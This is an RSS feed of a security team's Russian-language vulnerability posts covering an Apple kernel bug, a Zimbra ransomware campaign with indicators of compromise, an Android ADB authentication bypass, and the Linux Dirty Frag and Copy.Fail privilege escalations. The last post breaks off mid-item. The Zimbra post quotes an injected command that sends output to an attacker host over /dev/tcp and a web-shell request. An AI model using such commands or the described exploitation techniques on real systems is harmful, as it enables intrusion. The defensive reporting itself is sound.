<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>cve &#8211; PT ESC</title>
	<atom:link href="/tag/cve/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Mon, 05 Oct 2026 13:06:16 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>cve &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Мы помогли Apple устранить уязвимость в ядре ее операционных систем</title>
		<link>/we-helped-apple-fix-a-vulnerability-in-the-kernel-of-its-operating-systems/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Fri, 25 Sep 2026 17:20:39 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[ios]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[macos]]></category>
		<guid isPermaLink="false">/%d0%bc%d1%8b-%d0%bf%d0%be%d0%bc%d0%be%d0%b3%d0%bb%d0%b8-apple-%d1%83%d1%81%d1%82%d1%80%d0%b0%d0%bd%d0%b8%d1%82%d1%8c-%d1%83%d1%8f%d0%b7%d0%b2%d0%b8%d0%bc%d0%be%d1%81%d1%82%d1%8c-%d0%b2-%d1%8f%d0%b4/</guid>

					<description><![CDATA[Мы помогли Apple устранить уязвимость в ядре ее операционных систем Эксперт PT ESC Михаил Ложников обнаружил недостаток, который мог вызвать внезапное завершение работы системы (сбой ядра) или повреждение памяти ядра (kernel memory…]]></description>
										<content:encoded><![CDATA[<figure class="wp-block-video"><video controls preload="metadata" src="/wp-content/uploads/2026/09/903.mp4"></video></figure>
<p><strong>Мы помогли Apple устранить уязвимость в ядре ее операционных систем</strong></p>
<p>Эксперт PT ESC<strong> Михаил Ложников</strong> обнаружил недостаток, который мог вызвать внезапное завершение работы системы (сбой ядра) или повреждение памяти ядра (kernel memory corruption) в продукции компании Apple.</p>
<p>⚠️ Уязвимость <a href="https://dbugs.ptsecurity.com/vulnerability/PT-2026-76847?fts%5Bvalue%5D=CVE-2026-65330" rel="noopener" target="_blank">PT-2026-76847</a> (<a href="https://nvd.nist.gov/vuln/detail/cve-2026-65330" rel="noopener" target="_blank">CVE-2026-65330</a>) получила средний уровень критичности — 6.5 по шкале CVSS 3.x.</p>
<p><strong>Делимся подробностями</strong></p>
<p>• Ошибка была обнаружена в BSD-подсистеме сетевого стека XNU (ядра macOS, iOS) в компоненте NECP (Network Extension Control Policy), который управляет правами доступа программ и приложений к сетевым интерфейсам.</p>
<p>• Для взаимодействия с NECP требуется процесс с привилегированными правами, подписанный цифровой подписью (platform-signed).</p>
<p>• При закрытии NECP-сессии ядро корректно освобождает domain-фильтры, но domain-trie (префиксное дерево доменов) остается в глобальном списке с указателем на уже освобожденную память сессии.</p>
<p>• При удалении trie по идентификатору (ID) ядро не проверяет владельца.</p>
<p>• Любая другая сессия может удалить чужое префиксное дерево, вследствие чего может произойти ошибка и ядро вызовет панику.</p>
<p><strong>🍏</strong><strong> Скорее обновляйте ваши устройства</strong></p>
<p>Apple уже выпустила исправление безопасности в <strong>iOS/iPadOS 26.6.1, macOS 26.6.2, tvOS 27, watchOS 27</strong> и <strong>visionOS 27</strong>.</p>
<p>Подробная информация об исправлениях опубликована на официальных страницах Apple: <a href="https://support.apple.com/en-us/148281" rel="noopener" target="_blank">macOS</a>, <a href="https://support.apple.com/en-bw/148282" rel="noopener" target="_blank">iOS и iPadOS</a>, <a href="https://support.apple.com/en-us/149036" rel="noopener" target="_blank">tvOS</a>, <a href="https://support.apple.com/en-us/149037" rel="noopener" target="_blank">watchOS</a> и <a href="https://support.apple.com/en-us/149038" rel="noopener" target="_blank">visionOS</a>.</p>
<p><span class="hashtag">#cve</span> <span class="hashtag">#ir</span> <span class="hashtag">#ios</span> <span class="hashtag">#macos</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		<enclosure url="/wp-content/uploads/2026/09/903.mp4" length="934327" type="video/mp4" />

			</item>
		<item>
		<title>Ваш сервер Zimbra под угрозой</title>
		<link>/your-zimbra-server-is-at-risk/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 16:23:41 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%b0%d1%88-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80-zimbra-%d0%bf%d0%be%d0%b4-%d1%83%d0%b3%d1%80%d0%be%d0%b7%d0%be%d0%b9/</guid>

					<description><![CDATA[Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на…]]></description>
										<content:encoded><![CDATA[<p>Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости <a href="https://nvd.nist.gov/vuln/detail/cve-2026-73570" rel="noopener" target="_blank">CVE-2026-73570</a> и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.</p>
<p><em>Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.</p>
<p></em></p>
<blockquote>
<p>Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.</p>
<p>Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.</p>
</blockquote>
<p>👀 <strong>Сценарий атаки:</p>
<p></strong>1. В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл <code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt</code> (или <code>versions.txt</code>), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.</p>
<p>2. На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, <a href="https://t.me/ptescalator/112" rel="noopener" target="_blank">как детектировать инструмент Gsocket</a>.</p>
<p>3. Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.</p>
<p>4. После шифрования файлов шифровальщик изменяет их расширение на <code>.elock</code>, а также создает в зашифрованных директориях файлы <code>!README_RECOVER.txt</code>, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.</p>
<p>📫 <strong>Как проверить ваш почтовый сервер Zimbra на предмет наличия признаков компрометации?</p>
<p></strong>1. В основном системном журнале почтовой службы<code> /var/log/maillog</code> записи, содержащие подстроку <code>changed from stopped to</code>, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.</p>
<p>Для поиска вредоносных событий на вашем сервере может использоваться следующая команда: <code>grep &quot;changed from stopped to&quot; /var/log/maillog</p>
<p></code>Пример выполнения команды <code>id</code> и передачи ее вывода на С2-сервер злоумышленников:</p>
<pre><code>Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id&gt;/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n  

- время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; 
- [REDACTED_IP_1]: С2 адрес злоумышленников; 
- id&gt;/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.</code></pre>
<p>2. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.</p>
<p>Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newermt &#039;2026-07-01&#039;</code> (поиск по дате изменения файла)</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newerBt &#039;2026-07-01&#039;</code> (поиск по дате создания файла)</p>
<p><em>Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку.</p>
<p></em>Также проверьте сервер антивирусными средствами.</p>
<p>3. В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение <code>/var/log/nginx/access.log</code>) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах (в частности, часто используемый каталог <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>), могут свидетельствовать о наличии WEB-shell&#039;ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.</p>
<p>Пример вывода результата выполнения команды <code>ls</code> в браузер атакующего:</p>
<pre><code>[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889  

- [REDACTED_IP]: С2 адрес злоумышленников; 
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; 
- public/bzng.jsp: расположение WEB-shell; 
- ls: выполняемая команда.</code></pre>
<p>Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы <a href="https://github.com/Ed1s0nZ/CyberStrikeAI" rel="noopener" target="_blank">CyberStrikeAI</a>, размещенные на нескольких С2-серверах (<em>скриншоты 1 и 2</em>).</p>
<figure class="wp-block-image"><img width="1024" height="834" src="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg 1024w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-300x244.jpg 300w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-768x625.jpg 768w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41.jpg 1045w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 1</figcaption></figure>
<p><code>CyberStrikeAI</code> — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.</p>
<figure class="wp-block-image"><img width="1024" height="523" src="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg 1024w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-300x153.jpg 300w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-768x392.jpg 768w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1536x784.jpg 1536w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-2048x1046.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 2</figcaption></figure>
<p>Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.</p>
<p>💡 <strong>Рекомендуем:</p>
<p></strong>1. Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.</p>
<p>2. В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета <code>zimbra-snmp</code>.</p>
<p>3. Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.</p>
<p><strong>Файловые индикаторы компрометации:</strong></p>
<blockquote>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.tx</code>t или <code>versions.txt</code> — файл, содержащий версию ПО Zimbra;</p>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp</code> — WEB-shell;</p>
<p><code>/opt/zimbra/log/defunct</code> — Gsocket;</p>
<p><code>elockc[a-z]</code> (например, <code>elockcl</code>) — шифровальщик;</p>
<p><code>runloop.sh</code> — скрипт, создаваемый шифровальщиком;</p>
<p><code>!README_RECOVER.txt</code> — записка злоумышленников;</p>
<p><code>*.elock</code> — файлы с расширением <code>.elock</code>.</p>
</blockquote>
<p><strong>Сетевые индикаторы компрометации:</strong></p>
<pre><code>135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35</code></pre>
<p><strong><br />
Gsocket:</strong></p>
<pre><code>*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242</code></pre>
<p><span class="hashtag">#IR</span> <span class="hashtag">#CVE</span> <span class="hashtag">#Malware</span> <span class="hashtag">#detect</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>⚠️ Включил отладку по Wi-Fi — получил Mamont</title>
		<link>/enabled-wi-fi-debugging-got-mamont/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Mon, 01 Jun 2026 15:05:04 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[mobile]]></category>
		<guid isPermaLink="false">/%e2%9a%a0%ef%b8%8f/</guid>

					<description><![CDATA[⚠️ Включил отладку по Wi-Fi — получил Mamont В начале мая на устройствах Android была обнаружена уязвимость CVE-2026-0073, которая позволяет удаленно выполнять команды на мобильном устройстве без подтверждения со стороны пользователя. Уязвимы…]]></description>
										<content:encoded><![CDATA[<p><strong>⚠️</strong><strong> Включил отладку по Wi-Fi — получил Mamont</strong></p>
<p>В начале мая на устройствах Android была обнаружена уязвимость <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-0073" rel="noopener" target="_blank">CVE-2026-0073</a>, которая позволяет удаленно выполнять команды на мобильном устройстве без подтверждения со стороны пользователя.</p>
<p>Уязвимы устройства с Android 11 и выше, на которых включена функция отладки по Wi-Fi.</p>
<p><strong>Функция отладки по Wi-Fi является легитимной</strong> — она позволяет подключаться к мобильному устройству для установки, тестирования приложений и создания резервных копий (<em>скриншот 1</em>). Для использования этой функции необходимо осуществить сопряжение с ПК и подтвердить доверенные связи. <code>CVE-2026-0073</code> дает возможность пропустить этап подтверждения связей и сразу взаимодействовать с устройством.</p>
<p><strong>🧐</strong><strong> </strong>Мы решили изучить, как далеко может зайти злоумышленник при эксплуатации данной CVE.</p>
<p><strong>Схема заражения устройства:</strong></p>
<p>1️⃣ Пользователь с включенной отладкой по Wi-Fi подключается к незащищенной Wi-Fi-сети.</p>
<p>2️⃣ Злоумышленник, находясь в этой же сети, сканирует ее на наличие адресов с открытыми портами для отладки по ADB (<em>скриншот 2</em>).</p>
<p>3️⃣ Проэксплуатировав <code>CVE-2026-0073</code>, злоумышленник получает доступ к командной строке мобильного устройства и может выполнять различные команды на устройстве (<em>скриншот 3</em>):</p>
<p>➖ получать доступ к спискам контактов, звонков, SMS-сообщений и установленных приложений;<br />
➖ удалять и устанавливать приложения без ведома пользователя;<br />
➖ повышать привилегии установленного приложения, выдав ему специальные разрешения на устройстве: <strong>специальные возможности</strong> (Accessibility Services) и <strong>доступ к уведомлениям</strong> (Notification Access).</p>
<p>Получив необходимые данные, злоумышленник может удалить легитимное приложение на устройстве и заменить его на приложение с вредоносными функциями (<em>скриншот 4</em>).</p>
<p>4️⃣ Происходит кража пользовательских данных и их отправка на серверы злоумышленников.</p>
<p><strong>Почему так происходит?</strong></p>
<p>1️⃣ Уязвимость находится в демоне Android Debug Bridge — adbd: в функции проверки TLS-сертификатов <code>adbd_tls_verify_cert</code> в <code>auth.cpp</code>.</p>
<p>2️⃣ Атака затрагивает режим Wireless Debugging / ADB-over-TCP, где подключение между ПК и устройством строится через mutual TLS: Android проверяет клиентский сертификат подключающегося хоста.</p>
<p>3️⃣ В нормальном режиме adbd сравнивает публичный ключ сертификата клиента с ранее доверенным ключом, сохраненным после ADB pairing.</p>
<p>4️⃣ Ошибка возникает из-за неправильной обработки результата функции <code>EVP_PKEY_cmp</code>: код считает любое ненулевое значение успешным совпадением ключа.</p>
<p>5️⃣ Злоумышленник подменяет TLS-сертификат, используя ключ другого типа (например, <code>EC/Ed25519</code> вместо <code>RSA</code>). В таком случае <code>EVP_PKEY_cmp</code> возвращает <code>-1</code> («разные типы ключей»), но уязвимый код воспринимает это как успешную проверку.</p>
<p>6️⃣ Происходит обход mutual TLS-аутентификации: adbd ошибочно считает атакующего доверенным ADB-хостом.</p>
<p>7️⃣ После обхода проверки атакующий получает удаленный доступ к ADB shell без взаимодействия с пользователем устройства.</p>
<p>Для успешной эксплуатации уязвимости необходимо, чтобы устройство хотя бы раз подключалось к какому-либо хосту и в списке доверенных устройств хранился хотя бы один публичный ключ.</p>
<p>🛠<strong> Как защитить ваши устройства:</strong></p>
<p>1️⃣ Выключайте функцию отладки по Wi-Fi, когда она не используется. Ввиду особенности эксплуатации <code>CVE-2026-0073</code> подвержены только устройства с включенной отладкой по Wi-Fi. Эта функция по умолчанию выключена, поэтому у обычных пользователей риск минимален.</p>
<p>2️⃣ Не включайте отладку по Wi-Fi в недоверенных сетях.</p>
<p>3️⃣ Устанавливайте обновления ОС на постоянной основе: патчи безопасности за май 2026 уже доступны на многих устройствах.</p>
<p>4️⃣ Настройте безопасность рабочей и личной Wi-Fi-сети: изолируйте клиентов и заблокируйте доступ по недоверенным портам.</p>
<p>5️⃣ Будьте внимательны к уведомлениям, которые приходят на ваше устройство. При подключении к отладке по Wi-Fi на экране устройства появляется уведомление о подключении стороннего устройства (<em>скриншот 5</em>).</p>
<p>Внимание к деталям сделает ваши устройства безопаснее.</p>
<figure class="wp-block-image"><img width="1024" height="741" src="/wp-content/uploads/2026/06/photo_565@01-06-2026_15-05-04-1024x741.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_565@01-06-2026_15-05-04-1024x741.jpg 1024w, /wp-content/uploads/2026/06/photo_565@01-06-2026_15-05-04-300x217.jpg 300w, /wp-content/uploads/2026/06/photo_565@01-06-2026_15-05-04-768x556.jpg 768w, /wp-content/uploads/2026/06/photo_565@01-06-2026_15-05-04.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="741" src="/wp-content/uploads/2026/06/photo_566@01-06-2026_15-05-04-1024x741.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_566@01-06-2026_15-05-04-1024x741.jpg 1024w, /wp-content/uploads/2026/06/photo_566@01-06-2026_15-05-04-300x217.jpg 300w, /wp-content/uploads/2026/06/photo_566@01-06-2026_15-05-04-768x556.jpg 768w, /wp-content/uploads/2026/06/photo_566@01-06-2026_15-05-04.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="747" height="1024" src="/wp-content/uploads/2026/06/photo_567@01-06-2026_15-05-04-747x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_567@01-06-2026_15-05-04-747x1024.jpg 747w, /wp-content/uploads/2026/06/photo_567@01-06-2026_15-05-04-219x300.jpg 219w, /wp-content/uploads/2026/06/photo_567@01-06-2026_15-05-04-768x1053.jpg 768w, /wp-content/uploads/2026/06/photo_567@01-06-2026_15-05-04.jpg 934w" sizes="auto, (max-width: 747px) 100vw, 747px" /></figure>
<figure class="wp-block-image"><img width="747" height="1024" src="/wp-content/uploads/2026/06/photo_568@01-06-2026_15-05-04-747x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/06/photo_568@01-06-2026_15-05-04-747x1024.jpg 747w, /wp-content/uploads/2026/06/photo_568@01-06-2026_15-05-04-219x300.jpg 219w, /wp-content/uploads/2026/06/photo_568@01-06-2026_15-05-04-768x1053.jpg 768w, /wp-content/uploads/2026/06/photo_568@01-06-2026_15-05-04.jpg 934w" sizes="auto, (max-width: 747px) 100vw, 747px" /></figure>
<p><span class="hashtag">#dfir</span> <span class="hashtag">#mobile</span> <span class="hashtag">#android</span> <span class="hashtag">#CVE</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Dirty Frag 🐧</title>
		<link>/dirty-frag/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 08 May 2026 12:08:09 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[avlab]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[sandbox]]></category>
		<guid isPermaLink="false">/dirty-frag-%f0%9f%90%a7/</guid>

					<description><![CDATA[Dirty Frag 🐧💥 Спустя неделю после нашумевшего Copy.Fail исследователь v4bel раскрыл новую технику повышения привилегий в ядре Linux — Dirty Frag. По состоянию на 8 мая у Dirty Frag нет CVE-номера и,…]]></description>
										<content:encoded><![CDATA[<p><strong>Dirty Frag 🐧</strong>💥</p>
<p>Спустя неделю после нашумевшего <a href="https://t.me/ptescalator/714" rel="noopener" target="_blank">Copy.Fail</a> исследователь v4bel <a href="https://github.com/V4bel/dirtyfrag" rel="noopener" target="_blank">раскрыл</a> новую технику повышения привилегий в ядре Linux — Dirty Frag.</p>
<p>По состоянию на 8 мая у Dirty Frag нет CVE-номера и, что более критично, официального патча от мейнтейнеров ядра тоже нет. Dirty Frag относится к тому же классу, что Dirty Pipe и Copy.Fail, но использует другой механизм: вместо pipe_buffer атакуется структура <code>sk_buff</code>.</p>
<p><em>Общие механизмы работы позволяют надежно блокировать эксплойт поведенческой экспертизой в PT Sandbox (Exploit.Linux.CVE-2022-0847.a, Exploit.Linux.CVE-2026-31431.a, Backdoor.Linux.Generic.a) — смотрите на скриншоте.</em></p>
<p><strong>Как это работает?</strong> 🧐</p>
<p>Dirty Frag — это цепочка из двух уязвимостей, которые дополняют друг друга, чтобы охватить все основные дистрибутивы:</p>
<p>1️⃣ Page-Cache Write (с 2017 года): предоставляет возможность для записи 4 байт в кэш страниц, но требует права на создание пользовательских пространств имен, что в некоторых системах (например, Ubuntu) может блокироваться AppArmor.</p>
<p>2️⃣ RxRPC Page-Cache Write (с июня 2023 года): не требует прав на пространства имен, но модуль <code>rxrpc.ko</code> присутствует только в некоторых дистрибутивах, включая Ubuntu, где он загружен по умолчанию.</p>
<p>Объединив их, атакующий получает рабочий эксплойт на любой системе, что позволяет:</p>
<p>• Подменить <code>suid-файлы</code> (например, <code>/usr/bin/su</code>) на свою версию<br />
• Изменить <code>/etc/passwd</code>, очистив пароль root-пользователя</p>
<p><strong>Кто под угрозой? ⛳️</strong></p>
<p>Практически все системы с ядром Linux, выпущенные с 2017 года. Исследователь подтвердил работу эксплойта на следующих версиях: Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44 и других.</p>
<p><strong>Как защититься? </strong><strong>🔧</strong></p>
<p>Так как официального патча от мейнтейнеров ядра пока нет, единственный способ защиты — немедленно отключить и выгрузить уязвимые модули ядра.</p>
<p><strong>Команда для отключения:</strong></p>
<pre><code>sh -c &quot;printf &#039;install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n&#039; &gt; /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2&gt;/dev/null; true&quot;</code></pre>
<p>Некоторые дистрибутивы (например, AlmaLinux) начали выпускать <a href="https://almalinux.org/blog/2026-05-07-dirty-frag/" rel="noopener" target="_blank">собственные патчи</a>, не дожидаясь апстрима.</p>
<p>UPD: уязвимость получила идентификатор — <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43284" rel="noopener" target="_blank">CVE-2026-43284</a>, патч добавлен в код ядра (<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4" rel="noopener" target="_blank">f4c50a4034e6</a>).</p>
<p><span class="hashtag">#avlab</span> <span class="hashtag">#cve</span> <span class="hashtag">#linux</span> <span class="hashtag">#sandbox</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a> (<a href="https://x.com/ptescalator" rel="noopener" target="_blank">X</a>, <a href="https://max.ru/join/V8dhsWy0FytLHcY_2m9KM99gsnBlr0v5RxOZFTOClho" rel="noopener" target="_blank">Max</a>)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Copy.Fail</title>
		<link>/copy-fail/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Thu, 30 Apr 2026 14:07:32 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/copy-fail/</guid>

					<description><![CDATA[Copy.Fail 🐧 Исследователи обнаружили баг в ядре Linux, который существовал в системах с 2017 года и затрагивает практически все дистрибутивы. Уязвимость CVE-2026-31431, которую мы считаем трендовой, состоит из четырех шагов: 1️⃣ Пользователь…]]></description>
										<content:encoded><![CDATA[<strong>Copy.Fail</strong> 🐧<br />
<br />
Исследователи <a href="https://copy.fail/#exploit" rel="noopener" target="_blank">обнаружили</a> баг в ядре Linux, который существовал в системах с 2017 года и затрагивает практически все дистрибутивы.<br />
<br />
<strong>Уязвимость </strong><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-31431" rel="noopener" target="_blank">CVE-2026-31431</a><strong>, которую мы считаем трендовой, состоит из четырех шагов:</strong><br />
<br />
1️⃣ Пользователь открывает сокет <code>AF_ALG</code> и инициализирует AEAD-алгоритм без привилегий;<br />
<br />
2️⃣ Через <code>splice()</code> страницы кэша целевого файла попадают в буфер операции;<br />
<br />
3️⃣ Ошибка в <code>authencesn</code> дает запись 4 байт за границы буфера прямо в страницы кэша;<br />
<br />
4️⃣ Ядро исполняет модифицированный setuid-файл из кэша → выполнение кода с правами root.<br />
<br />
Данная цепочка уязвимости частично схожа с Dirty Pipe (<a href="https://nvd.nist.gov/vuln/detail/cve-2022-0847" rel="noopener" target="_blank">CVE-2022-0847</a>), которая также использует системные вызовы:<br />
<br />
• <code>pipe</code> — создает однонаправленный канал передачи данных;<br />
<br />
• <code>splice</code> — позволяет передавать данные между файловыми дескрипторами без промежуточного копирования.<br />
<br />
<em>Так как данная уязвимость уже обнаруживалась в PT Sandbox при анализе ПО в образе Astra Linux, процесс эксплуатации новой уязвимости Copy Fail также обнаруживалась в PT Sandbox еще до выхода публичного эксплойта.</em><br />
<br />
Благодаря этому эксплойту можно перезаписывать не только suid-файлы, но и проводить другие модификации, делая системные изменения более скрытными.<br />
<br />
<strong>Как исправить</strong> 🔧<br />
<br />
Если вы администрируете Linux-системы — обновите ядро. Патч зафиксирован в коммите <code>a664bf3d603d</code>. Основные дистрибутивы начали выпускать исправленные пакеты с 29 апреля. После обновления потребуется перезагрузка.<br />
<br />
Если немедленное обновление невозможно — временная мера: отключить модуль <code>algif_aead</code>:<br />
<br />
